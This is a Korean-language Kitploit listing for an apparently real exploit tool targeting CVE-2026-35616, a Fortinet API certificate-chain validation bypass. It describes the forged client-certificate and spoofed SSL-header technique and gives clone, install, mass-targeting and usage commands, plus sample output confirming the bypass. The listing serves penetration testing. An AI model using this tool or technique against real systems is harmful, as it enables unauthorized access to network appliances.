Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-35616 — CVE-2026-35616용 익스플로잇 스크립트로, 유효한 CN을 발견하고 위조 클라이언트 인증서를 생성한 후 사용자 지정 헤더로 보호된 엔드포인트를 탐색하여 Fortinet API의 인증서 체인 검증을 우회합니다. | Kitploit
도구/GitHubGitHub/wa6n3r/cve-2026-35616
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAPI Security
GitHubwa6n3r/cve-2026-35616

CVE-2026-35616

CVE-2026-35616용 익스플로잇 스크립트로, 유효한 CN을 발견하고 위조 클라이언트 인증서를 생성한 후 사용자 지정 헤더로 보호된 엔드포인트를 탐색하여 Fortinet API의 인증서 체인 검증을 우회합니다.

저장소 보기
124개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-35616

작성자: wa6n3r | GitHub | Web

설명

Fortinet API의 인증서 체인 검증 우회 취약점을 악용합니다. 이 스크립트는 다양한 소스에서 유효한 Common Name(CN)을 자동으로 탐지하고, 가짜 클라이언트 인증서를 생성한 후 X-SSL-CLIENT-VERIFY 및 X-SSL-CLIENT-CERT 헤더를 사용하여 보호된 엔드포인트에 요청을 수행합니다.

!!!중요: 테스트에 대한 명시적 허가를 받은 시스템에서만 사용하십시오.

요구 사항

  • Python 3.8+
  • 종속성:
    • requests
    • cryptography
    • urllib3
  • 선택 사항: openssl (TLS 핸드셰이크를 통한 고급 CA 탐지용)

설치

root@kitploit:~
# 프로젝트 클론
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616

# 종속성 설치
pip install -r requirements.txt

## 사용법
# 기본 실행
python3 exploit.py

# 대상 및 포트 지정
python3 exploit.py <TARGET_IP> [PORT]

# 예시:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443

# 대상 파일 형식 (targets.txt)
대량 테스트 시 각 줄에 대상 주소 하나씩 targets.txt 파일을 생성하십시오:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal

# 출력 파일
성공적으로 실행되면 스크립트는 다음을 생성합니다:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — 다음을 포함한 JSON 형식의 상세 보고서:
사용된 CN
각 엔드포인트의 응답 상태
분석용 응답 접두사

# 출력 구조
[ wa6n3r ]  ◆  GH: github.com/wa6n3r  ◆  WEB: wa6n3r.com

[*] CVE-2026-35616 대상: https://192.168.1.100:443

[*] 여러 소스에서 CA CN 탐지 중...
  [•] TLS CA CN: 'fortinet-ca2'
  [•] ZTNA CA CN: 'support'
[*] 후보 CN 2개 발견: fortinet-ca2, support

[*] 우회 테스트를 위한 후보 CN 2개 검사 중...
  [+] CN='support' | HTTP 200 | retval=1 | 우회 확인됨

[*] CN='support'로 모든 cert_chain 엔드포인트 프로빙 중...

  GET   /api/v1/system/capabilities

        HTTP 200: '{"result": {"retval": 1, ...}}'

  [+] 결과 저장 위치: results/bypass_results_192.168.1.100_443_20260101_120000.json
도구 다운로드